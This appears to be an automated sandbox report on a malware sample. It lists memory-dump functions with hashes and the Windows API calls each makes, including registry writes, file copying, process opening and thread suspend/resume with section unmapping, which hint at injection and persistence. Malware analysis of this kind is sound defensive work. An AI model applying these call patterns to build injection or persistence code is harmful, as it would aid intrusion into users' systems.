  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
